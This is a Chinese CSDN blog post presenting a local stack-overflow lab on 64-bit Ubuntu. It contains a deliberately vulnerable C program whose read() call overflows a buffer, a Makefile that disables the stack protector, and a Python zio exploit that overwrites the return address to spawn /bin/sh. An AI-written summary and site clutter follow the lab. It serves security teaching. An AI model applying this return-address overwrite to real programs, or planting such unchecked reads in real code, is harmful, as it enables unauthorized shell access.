Linux如何检测栈溢出,Linux环境下栈溢出实验(一) 改变程序流程

简介 :

栈溢出是由于C语言系列没有内置检查机制来确保复制到缓冲区的数据不得大于缓冲区的大小,因此当这个数据足够大的时候,将会溢出缓冲区的范围。当溢出缓冲区之后 , 如果继续写入数据就有可能将内存中的重要数据覆盖 , 对程序甚至系统造成严重的影响 。骇客也会利用栈溢出来进行权限的提升等等非法操作

环境 :

1. ubuntu 16.04 64位

2. gcc 4.85

视频演示 :

代码 :

hello.c

#include

#include

#include

// 栈溢出后执行的函数

void bingo(){

system("/bin/sh"); // 调用 system 函数启动 /bin/sh 来获取 shell

}

int main(){

char buffer[36] = {0}; // 定义 36 个字符(字节)长度的字符数组 , 并全部初始化为 0

puts("Tell my why : ");

/* 溢出漏洞产生的原因就是因为 read 函数并没有对 buffer 数组的范围进行检查

* 如果我们向标准输入流中输入了超出 buffer 范围 (36个字节) 的数据 , 那么写操作并不会停止 , 而是会继续向内存中写入数据 , 而这些数据就是由我们控制的

* 我们知道 , buffer 数组是保存在内存中的栈段中的 , 而 main 函数的返回地址也是保存在栈段中的

* 因此 , 我们只需要控制写入的数据 , 将 main 函数的返回地址覆盖

* 这样 , 在主函数执行结束后 , 会 pop 栈中保存的主函数的返回地址 (事实上已经被我们写入的数据覆盖) 到 eip 寄存器中

* cpu 就会不会认为程序已经结束 , 而是继续根据 eip 寄存器指向的内存取指令执行 , 这样我们就达到了可以任意控制程序流程的目的

* 因此 , 我们为了能获取一个 shell , 我们需要将主函数的返回地址覆盖为 bingo 函数的地址

* 然后程序继续执行之后遇到 return 0 就会直接跳转到 bingo 函数 , 从而运行 /bin/sh , 我们就可以得到目标主机的 shell

* 由于时间关系 , 这里所有的操作都在本机进行 , 远程操作也是同样的道理 , 因此不再赘述

*/

read(0, buffer, 0xFF); // 使用 read 函数将标准输入流中的数据复制到 buffer 字符数组

printf("Good boy : %s\n", buffer); // 打印字符数组的长度

return 0; // 主函数返回

}

Makefile

a.out:hello.c

gcc -g -fno-stack-protector hello.c

clean:

rm ./a.out

exploit.py

#!/usr/bin/env python

# encoding:utf-8

from zio import *

Io = zio("./a.out") # 打开本地文件

payload = (0x7fffffffdd88 - 0x7fffffffdd50) * 'A' # 首先将 buffer 和 main 返回地址之间的所有数据都填充成垃圾数据 , 其实是为了能覆盖到 main 的返回地址

payload = payload + l64(0x4005ed) # 将 main 的返回地址覆盖为 bingo 的地址

# 这里的 l64 函数可以将一个 16 进制数转换为 64 位机的内存地址

# 我们知道 64 位机的机器字长为 8 字节 , 因此就需要用 8 个字符来填充

# 16 位机的寄存器是 16 位数的 , 两个字节 , 64 位机相应就是 8 字节

# 其实 l64(0x4005ed) 函数就返回了这个字符串 :

# "\xed\x05\x40\x00\x00\x00\x00\x00"

# 也可以直接手动写成上述字符串

# 现在开始写入数据

Io.write(payload)

# 写入之后应该执行 bingo 函数 也就是启动 /bin/sh

# 这个时候 , 我们就需要接管程序的输入输出

# 调用 interact() 这个函数来释放脚本对程序的控制

Io.interact()

# 现在脚本就编写完成了 , 测试一下吧

README.md

(gdb) 我们来整理一下这几个数据Quit

(gdb) 1. bingo 地址 : 0x4005edQuit

(gdb) 1. 偏移 : (main返回地址 - buffer首地址) = (0x7fffffffdd88 - 0x7fffffffdd50Quit

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux 64位系统中,栈溢出是一种常见的安全漏洞。栈溢出是指当程序写入超过栈分配的缓冲区的数据时,会覆盖到栈上的其他数据,从而导致程序的异常行为。这个漏洞可以被恶意攻击者利用,执行任意的代码或者获取敏感数据。 在64位系统中,栈溢出的原理和32位系统类似,但是由于64位系统的栈和寄存器的大小不同,所以在实际操作上会有所不同。一种常见的攻击方法是通过溢出覆盖返回地址,将程序的控制流引导到恶意代码执行的地址上。为了实现栈溢出攻击,攻击者需要了解目标程序的内存布局和对应的函数调用机制。 引用提到了关于Linux下64位缓冲区溢出的文章,对于想深入了解64位系统下的栈溢出攻击的人来说,这篇文章可能是一个很好的参考。引用提供了一个关于shellcode的示例,可以用来在64位系统中执行系统命令。而引用则指出本文的目的是让读者学习64位缓冲区溢出的基础知识。 总的来说,在Linux 64位系统中,栈溢出是一种常见的安全漏洞,攻击者可以通过溢出覆盖返回地址来执行恶意代码。为了进行栈溢出攻击,攻击者需要了解目标程序的内存布局和函数调用机制。可以参考引用中的文章来深入了解64位系统下的栈溢出攻击的细节。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [linux64 溢出,64位Linux下的栈溢出](https://blog.csdn.net/weixin_36383252/article/details/116872723)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [linux栈溢出](https://blog.csdn.net/qq_45323960/article/details/122766130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值